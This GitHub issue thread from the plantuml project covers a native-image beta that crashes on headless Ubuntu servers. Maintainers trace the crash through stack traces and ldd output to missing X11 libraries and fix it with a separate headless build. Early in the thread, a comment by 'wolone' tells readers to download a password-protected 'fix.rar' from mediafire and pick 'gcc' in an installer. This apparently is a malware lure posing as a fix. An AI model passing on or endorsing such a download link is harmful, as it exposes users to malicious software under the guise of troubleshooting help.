### ISSUE TITLE
Crash happened on plantuml 1.2024.7beta5, related to "headless"

### ISSUE THREAD

**Issue by sunlin7** [plantuml/plantuml#1879]
Hi,

I tried the latest release but it always crash for no `DISPLAY` available.
I run the plantuml on Ubuntu 20.04 server without DISPLAY, or with the `headless` mode.
```
$ plantuml "-Djava.awt.headless=true" -headless ... 
```
And the error logs:

> Exception in thread "main" java.awt.AWTError: Can't connect to X11 window server using ':0.0' as the value of the DISPLAY variable.
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jni.functions.JNIFunctions$NewObjectWithObjectArrayArgFunctionPointer.invoke(JNIFunctions.java)
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jni.functions.JNIFunctions.ThrowNew(JNIFunctions.java:907)
        at java.desktop@21.0.2/sun.awt.X11GraphicsEnvironment.initDisplay(Native Method)
        at java.desktop@21.0.2/sun.awt.X11GraphicsEnvironment$1.run(X11GraphicsEnvironment.java:105)
        at java.base@21.0.2/java.security.AccessController.executePrivileged(AccessController.java:129)
        at java.base@21.0.2/java.security.AccessController.doPrivileged(AccessController.java:319)
        at java.desktop@21.0.2/sun.awt.X11GraphicsEnvironment.initStatic(X11GraphicsEnvironment.java:64)
        at java.desktop@21.0.2/sun.awt.X11GraphicsEnvironment.<clinit>(X11GraphicsEnvironment.java:59)
        at java.desktop@21.0.2/sun.awt.PlatformGraphicsInfo.createGE(PlatformGraphicsInfo.java:37)
        at java.desktop@21.0.2/java.awt.GraphicsEnvironment$LocalGE.createGE(GraphicsEnvironment.java:93)
        at java.desktop@21.0.2/java.awt.GraphicsEnvironment$LocalGE.<clinit>(GraphicsEnvironment.java:84)
        at java.desktop@21.0.2/java.awt.GraphicsEnvironment.getLocalGraphicsEnvironment(GraphicsEnvironment.java:106)
        at java.desktop@21.0.2/java.awt.image.BufferedImage.createGraphics(BufferedImage.java:1182)
        at net.sourceforge.plantuml.FileFormat.<clinit>(FileFormat.java:162)
        at net.sourceforge.plantuml.Option.<init>(Option.java:147)
        at net.sourceforge.plantuml.Run.main(Run.java:131)
        at java.base@21.0.2/java.lang.invoke.LambdaForm$DMH/sa346b79c.invokeStaticInit(LambdaForm$DMH)

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by arnaudroques** [comment]
Could you tell us exactly which version you are using?

**Comment by sunlin7** [comment]
I tried the Linux version with the beta version
https://objects.githubusercontent.com/github-production-release-asset-2e65be/1051476/4b858fcc-2281-4d7d-9604-4b52b4dd942f?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240827T175804Z&X-Amz-Expires=300&X-Amz-Signature=368824fb261859701794c86e82d97fe275c5c6f8ae0d55245d26eb40e281f4ce&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=1051476&response-content-disposition=attachment%3B%20filename%3Dplantuml-linux-amd64-1.2024.7beta5.zip&response-content-type=application%2Foctet-stream

**Comment by The-Lum** [comment]
FYI @asm0dey:
- It seems to be a test of the native-image _([plantuml-linux-amd64-1.2024.7beta5](https://github.com/plantuml/plantuml/releases/tag/1.2024.7beta5))_

**Comment by asm0dey** [comment]
Oooh, this IS an interesting one. I can't reproduce it in this exact way, but here is what I get on a headless Ubuntu server:
```
Exception in thread "main" java.lang.UnsatisfiedLinkError: Can't load library: /home/finkel/plantuml-linux-amd64-1.2024.7beta5/libawt_xawt.so
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jdk.NativeLibrarySupport.loadLibraryAbsolute(NativeLibrarySupport.java:100)
        at java.base@21.0.2/java.lang.ClassLoader.loadLibrary(ClassLoader.java:114)
        at java.base@21.0.2/java.lang.Runtime.load0(Runtime.java:852)
        at java.base@21.0.2/java.lang.System.load(System.java:2025)
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jni.JNIOnLoadFunctionPointer.invoke(JNILibraryInitializer.java)
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jni.JNILibraryInitializer.callOnLoadFunction(JNILibraryInitializer.java:70)
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jni.JNILibraryInitializer.initialize(JNILibraryInitializer.java:133)
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jdk.NativeLibrarySupport.addLibrary(NativeLibrarySupport.java:204)
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jdk.NativeLibrarySupport.loadLibrary0(NativeLibrarySupport.java:160)
        at org.graalvm.nativeimage.builder/com.oracle.svm.core.jdk.NativeLibrarySupport.loadLibraryRelative(NativeLibrarySupport.java:123)
        at java.base@21.0.2/java.lang.ClassLoader.loadLibrary(ClassLoader.java:106)
        at java.base@21.0.2/java.lang.Runtime.loadLibrary0(Runtime.java:916)
        at java.base@21.0.2/java.lang.System.loadLibrary(System.java:2063)
        at java.desktop@21.0.2/java.awt.image.ColorModel$1.run(ColorModel.java:211)
        at java.desktop@21.0.2/java.awt.image.ColorModel$1.run(ColorModel.java:209)
        at java.base@21.0.2/java.security.AccessController.executePrivileged(AccessController.java:129)
        at java.base@21.0.2/java.security.AccessController.doPrivileged(AccessController.java:319)
        at java.desktop@21.0.2/java.awt.image.ColorModel.loadLibraries(ColorModel.java:208)
        at java.desktop@21.0.2/java.awt.image.ColorModel.<clinit>(ColorModel.java:221)
        at java.desktop@21.0.2/java.awt.image.BufferedImage.<clinit>(BufferedImage.java:286)
        at net.sourceforge.plantuml.FileFormat.<clinit>(FileFormat.java:161)
        at net.sourceforge.plantuml.Option.<init>(Option.java:147)
        at net.sourceforge.plantuml.Run.main(Run.java:131)
        at java.base@21.0.2/java.lang.invoke.LambdaForm$DMH/sa346b79c.invokeStaticInit(LambdaForm$DMH)
```

Let me look a bit deeper into it

**Comment by asm0dey** [comment]
Further investigation:
The library `libawt_xawt.so` is indeed there, but when we perform 
```
$ ldd libawt_xawt.so
        linux-vdso.so.1 (0x00007ffcb39fe000)
        libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f2636919000)
        libawt.so => /home/finkel/plantuml-linux-amd64-1.2024.7beta5/./libawt.so (0x00007f2636600000)
        libXext.so.6 => /lib/x86_64-linux-gnu/libXext.so.6 (0x00007f2636cd4000)
        libX11.so.6 => /lib/x86_64-linux-gnu/libX11.so.6 (0x00007f26364c0000)
        libXrender.so.1 => not found
        libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f2636ccd000)
        libXtst.so.6 => not found
        libXi.so.6 => not found
        libjava.so => /home/finkel/plantuml-linux-amd64-1.2024.7beta5/./libjava.so (0x00007f2636cc8000)
        libjvm.so => /home/finkel/plantuml-linux-amd64-1.2024.7beta5/./libjvm.so (0x00007f2636cc3000)
        libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f2636cbe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2636297000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f2636cf0000)
        libxcb.so.1 => /lib/x86_64-linux-gnu/libxcb.so.1 (0x00007f2636c92000)
        libXau.so.6 => /lib/x86_64-linux-gnu/libXau.so.6 (0x00007f2636c8c000)
        libXdmcp.so.6 => /lib/x86_64-linux-gnu/libXdmcp.so.6 (0x00007f2636c84000)
        libbsd.so.0 => /lib/x86_64-linux-gnu/libbsd.so.0 (0x00007f2636901000)
        libmd.so.0 => /lib/x86_64-linux-gnu/libmd.so.0 (0x00007f26368f4000)
```

Obviously, on a headless system there is no libXrender. 
Seems like we need to build 2 sets of binaries: headless and headfull

**Comment by asm0dey** [comment]
@sunlin7 could you please try the headless build I built in my fork?
https://github.com/asm0dey/plantuml/releases/tag/native

**Comment by sunlin7** [comment]
Hi @Pasha Finkelshteyn,

It works! The plantuml-headless works for me now, thanks!

PS: I have to run plantuml-headless with -headless option.
Is it possible to apply the -headless automatically for its name imply it should be headless. Thanks.

**Comment by asm0dey** [comment]
I also just do not see such an option in `-help`, which raises even more questions

**Comment by asm0dey** [comment]
@The-Lum I think we've solved the main issue, it's now a matter of accepting the PR :)

**Comment by sunlin7** [comment]
Agree, the main issue resolved 👏

And I run the plantuml-headless with 'DISPLAY' env string available will met issue.  Unset the DISPLAY will works.

**Comment by asm0dey** [comment]
Well, I think running the headless version with DISPLAY does not make huge sense anyways. If you have X - yiu need the full version probably

**Comment by sunlin7** [comment]
Sure. And please feel free to close this ticket, thank you!

**Comment by asm0dey** [comment]
It's up to @The-Lum

**Comment by asm0dey** [comment]
We also need to delete the older artifacts, I think :)

**Comment by The-Lum** [comment]
> We also need to delete the older artifacts, I think :)

Done.
I will also change some `tag` name and pre-release attribute...
I search also to do a native for the release....

Regards,
Th.

**Comment by The-Lum** [comment]
@asm0dey: Good catch for `full` and `headless`.

🗣️ Off-topic:
During search about Native Image of PlantUML, I discover also this discussion about `Locale`:
- https://github.com/yuzutech/plantuml/issues/41#issuecomment-1937554331

Then here are some questions:
- Do you know if it is implemented or not?
- And if we must to implement or not?

Regards,
Th.

**Comment by asm0dey** [comment]
I think that all the localrs should work correctly. Please test if you can and create an issue if they doesn't, I'm happy to fix. But then again, I think they should work.

**Comment by asm0dey** [comment]
If they don't - well, should be trivial to fix with one line in build.gradle
